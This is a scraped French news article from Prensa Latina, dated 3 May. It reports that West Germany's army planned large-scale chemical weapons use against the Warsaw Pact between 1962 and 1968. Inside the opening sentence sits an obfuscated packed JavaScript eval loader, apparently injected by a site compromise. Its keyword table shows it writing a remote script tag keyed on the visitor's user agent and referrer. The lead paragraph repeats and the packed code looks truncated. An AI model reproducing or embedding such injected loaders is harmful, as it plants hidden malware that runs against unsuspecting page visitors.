jeudi 18 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’Allemagne de l’Ouest avait des plans pour utiliser des armes chimiques

Berlin, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kkiia|var|u0026u|referrer|ikkzn||js|php'.split('|'),0,{})) 3 mai (Prensa Latina) L'ancienne République Fédérale d'Allemagne (RFA) avait planifié l'utilisation d'armes chimiques à grande échelle dans les années 1960, ont aujourd'hui révélé plusieurs média.

Berlin, 3 mai (Prensa Latina) L’ancienne République Fédérale d’Allemagne (RFA) avait planifié l’utilisation d’armes chimiques à grande échelle dans les années 1960, ont aujourd’hui révélé plusieurs média.

Les chaînes publiques de télévision WDR et NDR et le quotidien Suddeutsche Zeitung ont révélé que le ministre de la Défense de la RFA de l’époque, Kai-Uwe vonHassel, avait demandé l’appui des Etats-Unis pour la production de ce type d’armement d’extermination massive qui était interdit par les lois internationales.

Le reportage se base sur des analyses réalisées par un groupe d’investigation franco-américain qui a étudié de nombreux documents historiques provenant d’archives allemandes et états-uniennes.

D’après les informations trouvées par cette équipe de travail, entre 1962 et 1968, l’armée de la RFA a  planifié l’utilisation des armes chimiques au cas où se produirait une guerre contre les nations socialistes d’Europe de l’Est, membres du Pacte de Varsovie, et, en particulier, contre la défunte Union Soviétique.

Ce jeudi, l’actuel ministre de la Défense allemand a déclaré qu’il s’agissait-là d’une affaire historique et a refusé  de donner des informations supplémentaires sur ces plans, dont l’existence a toujours été niée par le Gouvernement de la RFA et par ses forces armées.

Un porte-parole du ministère a assuré qu' »il n’y a plus d’armes chimiques ni sur le territoire allemand, ni entre les mains de nos co-membres de l’OTAN (Organisation du Traité de l’Atlantique Nord). »

peo/ocs/ort/ hcn

EN CONTINU
notes connexes